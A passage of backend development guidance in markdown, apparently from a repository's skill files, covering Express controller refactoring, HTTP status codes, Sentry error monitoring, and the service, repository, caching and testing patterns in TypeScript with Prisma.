    if (error instanceof z.ZodError) {
      return this.handleError(error, res, 'createUser', 400);
    }
    this.handleError(error, res, 'createUser');
  }
}
```

---
## HTTP Status Codes

### Standard Codes

| Code | Use Case | Example |
|------|----------|---------|
| 200 | Success (GET, PUT) | User retrieved, updated |
| 201 | Created (POST) | User created |
| 204 | No Content (DELETE) | User deleted |
| 400 | Bad Request | Invalid input data |
| 401 | Unauthorized | Not authenticated |
| 403 | Forbidden | No permission |
| 404 | Not Found | Resource doesn't exist |
| 409 | Conflict | Duplicate resource |
| 422 | Unprocessable Entity | Validation failed |
| 500 | Internal Server Error | Unexpected error |

### Usage Examples

```typescript
// 200 - Success (default)
this.handleSuccess(res, user);

// 201 - Created
this.handleSuccess(res, user, 'Created', 201);

// 400 - Bad Request
this.handleError(error, res, 'operation', 400);

// 404 - Not Found
this.handleError(new Error('Not found'), res, 'operation', 404);

// 403 - Forbidden
this.handleError(new ForbiddenError('No permission'), res, 'operation', 403);
```

---
## Refactoring Guide

### Identify Routes Needing Refactoring

**Red Flags:**
- Route file > 100 lines
- Multiple try-catch blocks in one route
- Direct database access (Prisma calls)
- Complex business logic (if statements, loops)
- Permission checks in routes

**Check your routes:**
```bash
# Find large route files
wc -l form/src/routes/*.ts | sort -n

# Find routes with Prisma usage
grep -r "PrismaService" form/src/routes/
```

### Refactoring Process
**1. Extract to Controller:**
```typescript
// Before: Route with logic
router.post('/action', async (req, res) => {
  try {
    // 50 lines of logic
  } catch (e) {
    handler.handleException(res, e);
  }
});

// After: Clean route
router.post('/action', (req, res) => controller.performAction(req, res));

// New controller method
async performAction(req: Request, res: Response): Promise<void> {
  try {
    const result = await this.service.performAction(req.body);
    this.handleSuccess(res, result);
  } catch (error) {
    this.handleError(error, res, 'performAction');
  }
}
```
**2. Extract to Service:**
```typescript
// Controller stays thin
async performAction(req: Request, res: Response): Promise<void> {
  try {
    const validated = actionSchema.parse(req.body);
    const result = await this.actionService.execute(validated);
    this.handleSuccess(res, result);
  } catch (error) {
    this.handleError(error, res, 'performAction');
  }
}

// Service contains business logic
export class ActionService {
  async execute(data: ActionDTO): Promise<Result> {
    // All business logic here:
    // - Permission checks
    // - Database operations
    // - Complex transformations
    return result;
  }
}
```
**3. Add Repository (if needed):**
```typescript
// Service calls repository
export class ActionService {
  constructor(private actionRepository: ActionRepository) {}

  async execute(data: ActionDTO): Promise<Result> {
    // Business logic
    const entity = await this.actionRepository.findById(data.id);
    // More logic
    return await this.actionRepository.update(data.id, changes);
  }
}

// Repository handles data access
export class ActionRepository {
  async findById(id: number): Promise<Entity | null> {
    return PrismaService.main.entity.findUnique({ where: { id } });
  }

  async update(id: number, data: Partial<Entity>): Promise<Entity> {
    return PrismaService.main.entity.update({ where: { id }, data });
  }
}
```

---

**Related Files:**
- [SKILL.md](SKILL.md) - Main guide
- [services-and-repositories.md](services-and-repositories.md) - Service layer details
- [complete-examples.md](complete-examples.md) - Full refactoring examples
336
skills/backend-dev-guidelines/resources/sentry-and-monitoring.md
Normal file
# Sentry Integration and Monitoring

Complete guide to error tracking and performance monitoring with Sentry v8.

## Table of Contents

- [Core Principles](#core-principles)
- [Sentry Initialization](#sentry-initialization)
- [Error Capture Patterns](#error-capture-patterns)
- [Performance Monitoring](#performance-monitoring)
- [Cron Job Monitoring](#cron-job-monitoring)
- [Error Context Best Practices](#error-context-best-practices)
- [Common Mistakes](#common-mistakes)

---
## Core Principles

**MANDATORY**: All errors MUST be captured to Sentry, no exceptions. Use Sentry v8 with comprehensive error tracking across all services.

---
## Sentry Initialization

### instrument.ts Pattern

**Location:** `src/instrument.ts` (MUST be the first import in server.ts and all cron jobs)

**Template for Microservices:**
```typescript
import * as Sentry from '@sentry/node';
import * as fs from 'fs';
import * as path from 'path';
import * as ini from 'ini';

const sentryConfigPath = path.join(__dirname, '../sentry.ini');
const sentryConfig = ini.parse(fs.readFileSync(sentryConfigPath, 'utf-8'));

Sentry.init({
  dsn: sentryConfig.sentry?.dsn,
  environment: process.env.NODE_ENV || 'development',
  tracesSampleRate: parseFloat(sentryConfig.sentry?.tracesSampleRate || '0.1'),
  profilesSampleRate: parseFloat(sentryConfig.sentry?.profilesSampleRate || '0.1'),

  integrations: [
    ...Sentry.getDefaultIntegrations({}),
    Sentry.extraErrorDataIntegration({ depth: 5 }),
    Sentry.localVariablesIntegration(),
    Sentry.requestDataIntegration({
      include: {
        cookies: false,
        data: true,
        headers: true,
        ip: true,
        query_string: true,
        url: true,
        user: { id: true, email: true, username: true },
      },
    }),
    Sentry.consoleIntegration(),
    Sentry.contextLinesIntegration(),
    Sentry.prismaIntegration(),
  ],

  beforeSend(event, hint) {
    // Filter health checks
    if (event.request?.url?.includes('/healthcheck')) {
      return null;
    }

    // Scrub sensitive headers
    if (event.request?.headers) {
      delete event.request.headers['authorization'];
      delete event.request.headers['cookie'];
    }

    // Mask emails for PII
    if (event.user?.email) {
      event.user.email = event.user.email.replace(/^(.{2}).*(@.*)$/, '$1***$2');
    }

    return event;
  },

  ignoreErrors: [
    /^Invalid JWT/,
    /^JWT expired/,
    'NetworkError',
  ],
});

// Set service context
Sentry.setTags({
  service: 'form',
  version: '1.0.1',
});

Sentry.setContext('runtime', {
  node_version: process.version,
  platform: process.platform,
});
```
**Critical Points:**
- PII protection built-in (beforeSend)
- Filters non-critical errors
- Comprehensive integrations
- Prisma instrumentation
- Service-specific tagging
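The PII masking inside `beforeSend` is easy to verify in isolation. The same regex, extracted into a standalone function:

```typescript
// The email mask from beforeSend above: keep the first two characters
// and the domain, hide everything in between.
function maskEmail(email: string): string {
  return email.replace(/^(.{2}).*(@.*)$/, '$1***$2');
}

const masked = maskEmail('alice@example.com'); // → 'al***@example.com'
```

Note that addresses with fewer than two characters before the `@` do not match the pattern and pass through unmasked, which may or may not be acceptable under your PII policy.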
---
## Error Capture Patterns

### 1. BaseController Pattern

```typescript
// Use BaseController.handleError
protected handleError(error: unknown, res: Response, context: string, statusCode = 500): void {
  Sentry.withScope((scope) => {
    scope.setTag('controller', this.constructor.name);
    scope.setTag('operation', context);
    scope.setUser({ id: res.locals?.claims?.userId });
    Sentry.captureException(error);
  });

  res.status(statusCode).json({
    success: false,
    error: { message: error instanceof Error ? error.message : 'Error occurred' }
  });
}
```
### 2. Workflow Error Handling

```typescript
import { SentryHelper } from '../utils/sentryHelper';

try {
  await businessOperation();
} catch (error) {
  SentryHelper.captureOperationError(error, {
    operationType: 'POST_CREATION',
    entityId: 123,
    userId: 'user-123',
    operation: 'createPost',
  });
  throw error;
}
```
### 3. Service Layer Error Handling

```typescript
try {
  await someOperation();
} catch (error) {
  Sentry.captureException(error, {
    tags: {
      service: 'form',
      operation: 'someOperation'
    },
    extra: {
      userId: currentUser.id,
      entityId: 123
    }
  });
  throw error;
}
```

---
## Performance Monitoring

### Database Performance Tracking

```typescript
import { DatabasePerformanceMonitor } from '../utils/databasePerformance';

const result = await DatabasePerformanceMonitor.withPerformanceTracking(
  'findMany',
  'UserProfile',
  async () => {
    return await PrismaService.main.userProfile.findMany({ take: 5 });
  }
);
```
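The utility's internals are not shown in this guide; one plausible shape is a timed pass-through wrapper (an illustrative sketch, not the actual `DatabasePerformanceMonitor`):

```typescript
// Illustrative sketch: time an async database call, report its duration,
// and return the result unchanged. In the real utility this is presumably
// where a Sentry span would be recorded instead of a console line.
async function withPerformanceTracking<T>(
  operation: string,
  model: string,
  fn: () => Promise<T>
): Promise<T> {
  const start = Date.now();
  try {
    return await fn();
  } finally {
    console.log(`[db] ${model}.${operation} took ${Date.now() - start}ms`);
  }
}
```

The `finally` block means the duration is reported even when the query throws, which is usually what you want for slow-query diagnostics.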
### API Endpoint Spans

```typescript
router.post('/operation', async (req, res) => {
  return await Sentry.startSpan({
    name: 'operation.execute',
    op: 'http.server',
    attributes: {
      'http.method': 'POST',
      'http.route': '/operation'
    }
  }, async () => {
    const result = await performOperation();
    res.json(result);
  });
});
```

---
## Cron Job Monitoring

### Mandatory Pattern

```typescript
#!/usr/bin/env node
import '../instrument'; // FIRST LINE after shebang
import * as Sentry from '@sentry/node';

async function main() {
  return await Sentry.startSpan({
    name: 'cron.job-name',
    op: 'cron',
    attributes: {
      'cron.job': 'job-name',
      'cron.startTime': new Date().toISOString(),
    }
  }, async () => {
    try {
      // Cron job logic here
    } catch (error) {
      Sentry.captureException(error, {
        tags: {
          'cron.job': 'job-name',
          'error.type': 'execution_error'
        }
      });
      console.error('[Cron] Error:', error);
      process.exit(1);
    }
  });
}

main().then(() => {
  console.log('[Cron] Completed successfully');
  process.exit(0);
}).catch((error) => {
  console.error('[Cron] Fatal error:', error);
  process.exit(1);
});
```

---
## Error Context Best Practices

### Rich Context Example

```typescript
Sentry.withScope((scope) => {
  // User context
  scope.setUser({
    id: user.id,
    email: user.email,
    username: user.username
  });

  // Tags for filtering
  scope.setTag('service', 'form');
  scope.setTag('endpoint', req.path);
  scope.setTag('method', req.method);

  // Structured context
  scope.setContext('operation', {
    type: 'workflow.complete',
    workflowId: 123,
    stepId: 456
  });

  // Breadcrumbs for timeline
  scope.addBreadcrumb({
    category: 'workflow',
    message: 'Starting step completion',
    level: 'info',
    data: { stepId: 456 }
  });

  Sentry.captureException(error);
});
```

---
## Common Mistakes

```typescript
// ❌ Swallowing errors
try {
  await riskyOperation();
} catch (error) {
  // Silent failure
}

// ❌ Generic error messages
throw new Error('Error occurred');

// ❌ Exposing sensitive data
Sentry.captureException(error, {
  extra: { password: user.password } // NEVER
});

// ❌ Missing async error handling
async function bad() {
  fetchData().then(data => processResult(data)); // Unhandled
}

// ✅ Proper async handling
async function good() {
  try {
    const data = await fetchData();
    processResult(data);
  } catch (error) {
    Sentry.captureException(error);
    throw error;
  }
}
```

---
**Related Files:**
- [SKILL.md](SKILL.md)
- [routing-and-controllers.md](routing-and-controllers.md)
- [async-and-errors.md](async-and-errors.md)
# Services and Repositories - Business Logic Layer

Complete guide to organizing business logic with services and data access with repositories.

## Table of Contents

- [Service Layer Overview](#service-layer-overview)
- [Dependency Injection Pattern](#dependency-injection-pattern)
- [Singleton Pattern](#singleton-pattern)
- [Repository Pattern](#repository-pattern)
- [Service Design Principles](#service-design-principles)
- [Caching Strategies](#caching-strategies)
- [Testing Services](#testing-services)

---
## Service Layer Overview

### Purpose of Services

**Services contain business logic** - the 'what' and 'why' of your application:

```
Controller asks: "Should I do this?"
Service answers: "Yes/No, here's why, and here's what happens"
Repository executes: "Here's the data you requested"
```

**Services are responsible for:**
- ✅ Business rules enforcement
- ✅ Orchestrating multiple repositories
- ✅ Transaction management
- ✅ Complex calculations
- ✅ External service integration
- ✅ Business validations

**Services should NOT:**
- ❌ Know about HTTP (Request/Response)
- ❌ Access Prisma directly (use repositories)
- ❌ Handle route-specific logic
- ❌ Format HTTP responses
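This division of labor can be sketched end to end. Everything below is illustrative (an in-memory repository standing in for Prisma, and hypothetical `UserRepository`/`UserService` names):

```typescript
// Repository interface: the "how" of data access, swappable in tests.
interface UserRepository {
  findActive(): Promise<{ id: string; name: string }[]>;
}

// Service: holds the business rule ("active users, sorted by name"),
// with no idea whether the data comes from Prisma or from memory.
class UserService {
  constructor(private users: UserRepository) {}

  async listActiveSorted() {
    const active = await this.users.findActive();
    return [...active].sort((a, b) => a.name.localeCompare(b.name));
  }
}

// In-memory repository, good enough to exercise the service.
const inMemoryRepo: UserRepository = {
  findActive: async () => [
    { id: '2', name: 'Zoe' },
    { id: '1', name: 'Ada' },
  ],
};

const service = new UserService(inMemoryRepo);
```

Swapping `inMemoryRepo` for a Prisma-backed implementation changes nothing in the service, which is the whole point of the boundary.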
---
## Dependency Injection Pattern

### Why Dependency Injection?

**Benefits:**
- Easy to test (inject mocks)
- Clear dependencies
- Flexible configuration
- Promotes loose coupling

### Excellent Example: NotificationService

**File:** `/blog-api/src/services/NotificationService.ts`
```typescript
// Define dependencies interface for clarity
export interface NotificationServiceDependencies {
  prisma: PrismaClient;
  batchingService: BatchingService;
  emailComposer: EmailComposer;
}

// Service with dependency injection
export class NotificationService {
  private prisma: PrismaClient;
  private batchingService: BatchingService;
  private emailComposer: EmailComposer;
  private preferencesCache: Map<string, { preferences: UserPreference; timestamp: number }> = new Map();
  private CACHE_TTL = (notificationConfig.preferenceCacheTTLMinutes || 5) * 60 * 1000;

  // Dependencies injected via constructor
  constructor(dependencies: NotificationServiceDependencies) {
    this.prisma = dependencies.prisma;
    this.batchingService = dependencies.batchingService;
    this.emailComposer = dependencies.emailComposer;
  }

  /**
   * Create a notification and route it appropriately
   */
  async createNotification(params: CreateNotificationParams) {
    const {
      recipientID,
      type,
      title,
      message,
      link,
      context = {},
      channel = 'both',
      priority = NotificationPriority.NORMAL,
    } = params;

    try {
      // Get template and render content, preferring caller-supplied values
      const template = getNotificationTemplate(type);
      const rendered = renderNotificationContent(template, context);
      const finalTitle = title ?? rendered.title;
      const finalMessage = message ?? rendered.message;
      const finalLink = link ?? rendered.link;

      // Create in-app notification record
      const notificationId = await createNotificationRecord({
        instanceId: parseInt(context.instanceId || '0', 10),
        template: type,
        recipientUserId: recipientID,
        channel: channel === 'email' ? 'email' : 'inApp',
        contextData: context,
        title: finalTitle,
        message: finalMessage,
        link: finalLink,
      });

      // Route notification based on channel
      if (channel === 'email' || channel === 'both') {
        await this.routeNotification({
          notificationId,
          userId: recipientID,
          type,
          priority,
          title: finalTitle,
          message: finalMessage,
          link: finalLink,
          context,
        });
      }

      return { id: notificationId };
    } catch (error) {
      ErrorLogger.log(error, {
        context: {
          '[NotificationService] createNotification': {
            type: params.type,
            recipientID: params.recipientID,
          },
        },
      });
      throw error;
    }
  }

  /**
   * Route notification based on user preferences
   */
  private async routeNotification(params: {
    notificationId: number;
    userId: string;
    type: string;
    priority: NotificationPriority;
    title: string;
    message: string;
    link?: string;
    context?: Record<string, any>;
  }) {
    // Get user preferences with caching
    const preferences = await this.getUserPreferences(params.userId);

    // Check if we should batch or send immediately
    if (this.shouldBatchEmail(preferences, params.type, params.priority)) {
      await this.batchingService.queueNotificationForBatch({
        notificationId: params.notificationId,
        userId: params.userId,
        userPreference: preferences,
        priority: params.priority,
      });
    } else {
      // Send immediately via EmailComposer
      await this.sendImmediateEmail({
        userId: params.userId,
        title: params.title,
        message: params.message,
        link: params.link,
        context: params.context,
        type: params.type,
      });
    }
  }

  /**
   * Determine if email should be batched
   */
  shouldBatchEmail(
    preferences: UserPreference,
    notificationType: string,
    priority: NotificationPriority
  ): boolean {
    // HIGH priority always immediate
    if (priority === NotificationPriority.HIGH) {
      return false;
    }

    // Check batch mode
    const batchMode = preferences.emailBatchMode || BatchMode.IMMEDIATE;
    return batchMode !== BatchMode.IMMEDIATE;
  }

  /**
   * Get user preferences with caching
   */
  async getUserPreferences(userId: string): Promise<UserPreference> {
    // Check cache first
    const cached = this.preferencesCache.get(userId);
    if (cached && Date.now() - cached.timestamp < this.CACHE_TTL) {
      return cached.preferences;
    }

    const preference = await this.prisma.userPreference.findUnique({
      where: { userID: userId },
    });

    const finalPreferences = preference || DEFAULT_PREFERENCES;

    // Update cache
    this.preferencesCache.set(userId, {
      preferences: finalPreferences,
      timestamp: Date.now(),
    });

    return finalPreferences;
  }
}
```
**Usage in Controller:**

```typescript
// Instantiate with dependencies
const notificationService = new NotificationService({
  prisma: PrismaService.main,
  batchingService: new BatchingService(PrismaService.main),
  emailComposer: new EmailComposer(),
});

// Use in controller
const notification = await notificationService.createNotification({
  recipientID: 'user-123',
  type: 'AFRLWorkflowNotification',
  context: { workflowName: 'AFRL Monthly Report' },
});
```
**Key Takeaways:**
- Dependencies passed via constructor
- Clear interface defines required dependencies
- Easy to test (inject mocks)
- Encapsulated caching logic
- Business rules isolated from HTTP
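The preferences cache above follows a general TTL-cache pattern. Extracted as a reusable helper (hypothetical, with an injectable clock so expiry can be demonstrated without waiting):

```typescript
// Generic time-to-live cache, the same shape as preferencesCache above.
// The clock is injectable purely so tests can advance time deterministically.
class TtlCache<V> {
  private store = new Map<string, { value: V; timestamp: number }>();
  constructor(private ttlMs: number, private now: () => number = Date.now) {}

  get(key: string): V | undefined {
    const hit = this.store.get(key);
    if (hit && this.now() - hit.timestamp < this.ttlMs) return hit.value;
    return undefined; // missing or expired
  }

  set(key: string, value: V): void {
    this.store.set(key, { value, timestamp: this.now() });
  }
}

// Deterministic clock to show expiry without sleeping.
let t = 0;
const cache = new TtlCache<string>(5 * 60 * 1000, () => t);
cache.set('user-1', 'immediate');
const fresh = cache.get('user-1'); // within the 5-minute TTL
t += 6 * 60 * 1000;                // advance 6 minutes
const stale = cache.get('user-1'); // expired, returns undefined
```

Note that expired entries are not evicted here, only ignored; a long-running service would also want periodic cleanup or a bounded map.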
---
## Singleton Pattern

### When to Use Singletons

**Use for:**
- Services with expensive initialization
- Services with shared state (caching)
- Services accessed from many places
- Permission services
- Configuration services

### Example: PermissionService (Singleton)

**File:** `/blog-api/src/services/permissionService.ts`
```typescript
|
||||||
|
import { PrismaService } from '@project-lifecycle-portal/database';
import type { PrismaClient } from '@prisma/client';

class PermissionService {
  private static instance: PermissionService;
  private prisma: PrismaClient;
  private permissionCache: Map<string, { canAccess: boolean; timestamp: number }> = new Map();
  private CACHE_TTL = 5 * 60 * 1000; // 5 minutes

  // Private constructor prevents direct instantiation
  private constructor() {
    this.prisma = PrismaService.main;
  }

  // Get singleton instance
  public static getInstance(): PermissionService {
    if (!PermissionService.instance) {
      PermissionService.instance = new PermissionService();
    }
    return PermissionService.instance;
  }

  /**
   * Check if user can complete a workflow step
   */
  async canCompleteStep(userId: string, stepInstanceId: number): Promise<boolean> {
    const cacheKey = `${userId}:${stepInstanceId}`;

    // Check cache
    const cached = this.permissionCache.get(cacheKey);
    if (cached && Date.now() - cached.timestamp < this.CACHE_TTL) {
      return cached.canAccess;
    }

    try {
      // Demo schema: the step instance maps to a post record
      const post = await this.prisma.post.findUnique({
        where: { id: stepInstanceId },
        include: {
          author: true,
        },
      });

      if (!post) {
        return false;
      }

      // Check if user has permission: the author or an admin may complete the step
      const canAccess = post.authorId === userId || (await this.isUserAdmin(userId));

      // Cache result
      this.permissionCache.set(cacheKey, {
        canAccess,
        timestamp: Date.now(),
      });

      return canAccess;
    } catch (error) {
      console.error('[PermissionService] Error checking step permission:', error);
      return false;
    }
  }

  /**
   * Check whether user has the admin role
   */
  private async isUserAdmin(userId: string): Promise<boolean> {
    const user = await this.prisma.user.findUnique({ where: { userID: userId } });
    return user?.roles.includes('admin') ?? false;
  }

  /**
   * Clear cache for user
   */
  clearUserCache(userId: string): void {
    for (const [key] of this.permissionCache) {
      if (key.startsWith(`${userId}:`)) {
        this.permissionCache.delete(key);
      }
    }
  }

  /**
   * Clear all cache
   */
  clearCache(): void {
    this.permissionCache.clear();
  }
}

// Export singleton instance
export const permissionService = PermissionService.getInstance();
```
**Usage:**

```typescript
import { permissionService } from '../services/permissionService';

// Use anywhere in the codebase
const canComplete = await permissionService.canCompleteStep(userId, stepId);

if (!canComplete) {
  throw new ForbiddenError('You do not have permission to complete this step');
}
```
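The singleton guarantee behind `getInstance()` can be seen in isolation with a minimal sketch (the `Registry` class is illustrative, not part of the codebase): the private constructor forces every caller through one static accessor, so all callers share one instance and its state.

```typescript
// Minimal singleton: private constructor + lazy static accessor.
class Registry {
  private static instance: Registry;
  private entries = new Map<string, number>();

  private constructor() {}

  static getInstance(): Registry {
    if (!Registry.instance) {
      Registry.instance = new Registry();
    }
    return Registry.instance;
  }

  set(key: string, value: number): void {
    this.entries.set(key, value);
  }

  get(key: string): number | undefined {
    return this.entries.get(key);
  }
}

const a = Registry.getInstance();
const b = Registry.getInstance();
a.set('hits', 1);

console.log(a === b);       // true: both references point to the same object
console.log(b.get('hits')); // 1: state written through one reference is visible through the other
```

This is exactly why `permissionService`'s cache stays consistent no matter which module imports it.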

---

## Repository Pattern

### Purpose of Repositories

**Repositories abstract data access** - the 'how' of data operations:

```
Service:    "Get me all active users sorted by name"
Repository: "Here's the Prisma query that does that"
```

**Repositories are responsible for:**
- ✅ All Prisma operations
- ✅ Query construction
- ✅ Query optimization (select, include)
- ✅ Database error handling
- ✅ Caching database results

**Repositories should NOT:**
- ❌ Contain business logic
- ❌ Know about HTTP
- ❌ Make decisions (that's the service layer)

### Repository Template

```typescript
// repositories/UserRepository.ts
import { PrismaService } from '@project-lifecycle-portal/database';
import type { User, Prisma } from '@project-lifecycle-portal/database';

export class UserRepository {
  /**
   * Find user by ID with optimized query
   */
  async findById(userId: string): Promise<User | null> {
    try {
      return await PrismaService.main.user.findUnique({
        where: { userID: userId },
        select: {
          userID: true,
          email: true,
          name: true,
          isActive: true,
          roles: true,
          createdAt: true,
          updatedAt: true,
        },
      });
    } catch (error) {
      console.error('[UserRepository] Error finding user by ID:', error);
      throw new Error(`Failed to find user: ${userId}`);
    }
  }

  /**
   * Find all active users
   */
  async findActive(options?: { orderBy?: Prisma.UserOrderByWithRelationInput }): Promise<User[]> {
    try {
      return await PrismaService.main.user.findMany({
        where: { isActive: true },
        orderBy: options?.orderBy || { name: 'asc' },
        select: {
          userID: true,
          email: true,
          name: true,
          roles: true,
        },
      });
    } catch (error) {
      console.error('[UserRepository] Error finding active users:', error);
      throw new Error('Failed to find active users');
    }
  }

  /**
   * Find user by email
   */
  async findByEmail(email: string): Promise<User | null> {
    try {
      return await PrismaService.main.user.findUnique({
        where: { email },
      });
    } catch (error) {
      console.error('[UserRepository] Error finding user by email:', error);
      throw new Error(`Failed to find user with email: ${email}`);
    }
  }

  /**
   * Create new user
   */
  async create(data: Prisma.UserCreateInput): Promise<User> {
    try {
      return await PrismaService.main.user.create({ data });
    } catch (error) {
      console.error('[UserRepository] Error creating user:', error);
      throw new Error('Failed to create user');
    }
  }

  /**
   * Update user
   */
  async update(userId: string, data: Prisma.UserUpdateInput): Promise<User> {
    try {
      return await PrismaService.main.user.update({
        where: { userID: userId },
        data,
      });
    } catch (error) {
      console.error('[UserRepository] Error updating user:', error);
      throw new Error(`Failed to update user: ${userId}`);
    }
  }

  /**
   * Delete user (soft delete by setting isActive = false)
   */
  async delete(userId: string): Promise<User> {
    try {
      return await PrismaService.main.user.update({
        where: { userID: userId },
        data: { isActive: false },
      });
    } catch (error) {
      console.error('[UserRepository] Error deleting user:', error);
      throw new Error(`Failed to delete user: ${userId}`);
    }
  }

  /**
   * Check if email exists
   */
  async emailExists(email: string): Promise<boolean> {
    try {
      const count = await PrismaService.main.user.count({
        where: { email },
      });
      return count > 0;
    } catch (error) {
      console.error('[UserRepository] Error checking email exists:', error);
      throw new Error('Failed to check if email exists');
    }
  }
}

// Export singleton instance
export const userRepository = new UserRepository();
```
|
||||||
|
|
||||||
|
**Using Repository in Service:**
|
||||||
|
|
||||||
|
```typescript
|
||||||
|
// services/userService.ts
|
||||||
|
import { userRepository } from '../repositories/UserRepository';
|
||||||
|
import { ConflictError, NotFoundError } from '../utils/errors';
|
||||||
|
|
||||||
|
export class UserService {
|
||||||
|
/**
|
||||||
|
* Create new user with business rules
|
||||||
|
*/
|
||||||
|
async createUser(data: { email: string; name: string; roles: string[] }): Promise<User> {
|
||||||
|
// Business rule: Check if email already exists
|
||||||
|
const emailExists = await userRepository.emailExists(data.email);
|
||||||
|
if (emailExists) {
|
||||||
|
throw new ConflictError('Email already exists');
|
||||||
|
}
|
||||||
|
|
||||||
|
// Business rule: Validate roles
|
||||||
|
const validRoles = ['admin', 'operations', 'user'];
|
||||||
|
const invalidRoles = data.roles.filter((role) => !validRoles.includes(role));
|
||||||
|
if (invalidRoles.length > 0) {
|
||||||
|
throw new ValidationError(`Invalid roles: ${invalidRoles.join(', ')}`);
|
||||||
|
}
|
||||||
|
|
||||||
|
// Create user via repository
|
||||||
|
return await userRepository.create({
|
||||||
|
email: data.email,
|
||||||
|
name: data.name,
|
||||||
|
roles: data.roles,
|
||||||
|
isActive: true,
|
||||||
|
});
|
||||||
|
}
|
||||||
|
|
||||||
|
/**
|
||||||
|
* Get user by ID
|
||||||
|
*/
|
||||||
|
async getUser(userId: string): Promise<User> {
|
||||||
|
const user = await userRepository.findById(userId);
|
||||||
|
|
||||||
|
if (!user) {
|
||||||
|
throw new NotFoundError(`User not found: ${userId}`);
|
||||||
|
}
|
||||||
|
|
||||||
|
return user;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
```

---

## Service Design Principles

### 1. Single Responsibility

Each service should have ONE clear purpose:

```typescript
// ✅ GOOD - Single responsibility
class UserService {
  async createUser() {}
  async updateUser() {}
  async deleteUser() {}
}

class EmailService {
  async sendEmail() {}
  async sendBulkEmails() {}
}

// ❌ BAD - Too many responsibilities
class UserService {
  async createUser() {}
  async sendWelcomeEmail() {} // Should be EmailService
  async logUserActivity() {} // Should be AuditService
  async processPayment() {} // Should be PaymentService
}
```

### 2. Clear Method Names

Method names should describe WHAT they do:

```typescript
// ✅ GOOD - Clear intent
async createNotification()
async getUserPreferences()
async shouldBatchEmail()
async routeNotification()

// ❌ BAD - Vague or misleading
async process()
async handle()
async doIt()
async execute()
```

### 3. Return Types

Always use explicit return types:

```typescript
// ✅ GOOD - Explicit types
async createUser(data: CreateUserDTO): Promise<User> {}
async findUsers(): Promise<User[]> {}
async deleteUser(id: string): Promise<void> {}

// ❌ BAD - Implicit any
async createUser(data) {} // No types!
```

### 4. Error Handling

Services should throw meaningful errors:

```typescript
// ✅ GOOD - Meaningful errors
if (!user) {
  throw new NotFoundError(`User not found: ${userId}`);
}

if (emailExists) {
  throw new ConflictError('Email already exists');
}

// ❌ BAD - Generic errors
if (!user) {
  throw new Error('Error'); // What error?
}
```

### 5. Avoid God Services

Don't create services that do everything:

```typescript
// ❌ BAD - God service
class WorkflowService {
  async startWorkflow() {}
  async completeStep() {}
  async assignRoles() {}
  async sendNotifications() {} // Should be NotificationService
  async validatePermissions() {} // Should be PermissionService
  async logAuditTrail() {} // Should be AuditService
  // ... 50 more methods
}

// ✅ GOOD - Focused services
class WorkflowService {
  constructor(
    private notificationService: NotificationService,
    private permissionService: PermissionService,
    private auditService: AuditService
  ) {}

  async startWorkflow() {
    // Orchestrate other services
    await this.permissionService.checkPermission();
    await this.workflowRepository.create();
    await this.notificationService.notify();
    await this.auditService.log();
  }
}
```
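A side benefit of constructor injection in the focused `WorkflowService` is testability: each collaborator can be replaced by a recording fake. A minimal self-contained sketch (all names here are illustrative, not from the codebase):

```typescript
// Dependencies are passed in, so a test can substitute recording fakes.
interface Notifier {
  notify(message: string): Promise<void>;
}

class ReportService {
  constructor(private notifier: Notifier) {}

  async publish(title: string): Promise<string> {
    // Orchestrate: build the report id, then notify subscribers
    const id = `report:${title.toLowerCase()}`;
    await this.notifier.notify(`published ${id}`);
    return id;
  }
}

// A fake that records calls instead of sending anything
class FakeNotifier implements Notifier {
  messages: string[] = [];
  async notify(message: string): Promise<void> {
    this.messages.push(message);
  }
}

async function main() {
  const fake = new FakeNotifier();
  const service = new ReportService(fake);
  const id = await service.publish('Q3');

  console.log(id);            // report:q3
  console.log(fake.messages); // [ 'published report:q3' ]
}

main();
```

The service never constructs its own dependencies, so swapping the fake for the real `Notifier` requires no change to `ReportService` itself.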

---

## Caching Strategies

### 1. In-Memory Caching

```typescript
class UserService {
  private cache: Map<string, { user: User; timestamp: number }> = new Map();
  private CACHE_TTL = 5 * 60 * 1000; // 5 minutes

  async getUser(userId: string): Promise<User | null> {
    // Check cache
    const cached = this.cache.get(userId);
    if (cached && Date.now() - cached.timestamp < this.CACHE_TTL) {
      return cached.user;
    }

    // Fetch from database
    const user = await userRepository.findById(userId);

    // Update cache
    if (user) {
      this.cache.set(userId, { user, timestamp: Date.now() });
    }

    return user;
  }

  clearUserCache(userId: string): void {
    this.cache.delete(userId);
  }
}
```

### 2. Cache Invalidation

```typescript
class UserService {
  async updateUser(userId: string, data: UpdateUserDTO): Promise<User> {
    // Update in database
    const user = await userRepository.update(userId, data);

    // Invalidate cache
    this.clearUserCache(userId);

    return user;
  }
}
```
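The check-TTL-then-fetch-then-store dance above repeats in every service that caches. A small generic helper can centralize it; this is a sketch with illustrative names, not a utility from the codebase:

```typescript
// Generic TTL cache: wraps any async loader with expiry-based memoization.
class TtlCache<V> {
  private entries = new Map<string, { value: V; timestamp: number }>();

  constructor(private ttlMs: number) {}

  async getOrLoad(key: string, load: () => Promise<V>): Promise<V> {
    const hit = this.entries.get(key);
    if (hit && Date.now() - hit.timestamp < this.ttlMs) {
      return hit.value; // fresh entry: skip the loader
    }
    const value = await load();
    this.entries.set(key, { value, timestamp: Date.now() });
    return value;
  }

  invalidate(key: string): void {
    this.entries.delete(key);
  }
}

async function main() {
  const cache = new TtlCache<number>(5 * 60 * 1000);
  let loads = 0;
  const loader = async () => {
    loads += 1;
    return 42;
  };

  await cache.getOrLoad('answer', loader);
  await cache.getOrLoad('answer', loader); // served from cache

  console.log(loads); // 1

  cache.invalidate('answer');
  await cache.getOrLoad('answer', loader); // reloads after invalidation
  console.log(loads); // 2
}

main();
```

A service then keeps only the invalidation call in `updateUser` and delegates the freshness logic to the helper.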

---

## Testing Services

### Unit Tests

```typescript
// tests/userService.test.ts
import { UserService } from '../services/userService';
import { userRepository } from '../repositories/UserRepository';
import { ConflictError } from '../utils/errors';

// Mock repository
jest.mock('../repositories/UserRepository');

describe('UserService', () => {
  let userService: UserService;

  beforeEach(() => {
    userService = new UserService();
    jest.clearAllMocks();
  });

  describe('createUser', () => {
    it('should create user when email does not exist', async () => {
      // Arrange
      const userData = {
        email: 'test@example.com',
        name: 'Test User',
        roles: ['user'],
      };

      (userRepository.emailExists as jest.Mock).mockResolvedValue(false);
      (userRepository.create as jest.Mock).mockResolvedValue({
        userID: '123',
        ...userData,
      });

      // Act
      const user = await userService.createUser(userData);

      // Assert
      expect(user).toBeDefined();
      expect(user.email).toBe(userData.email);
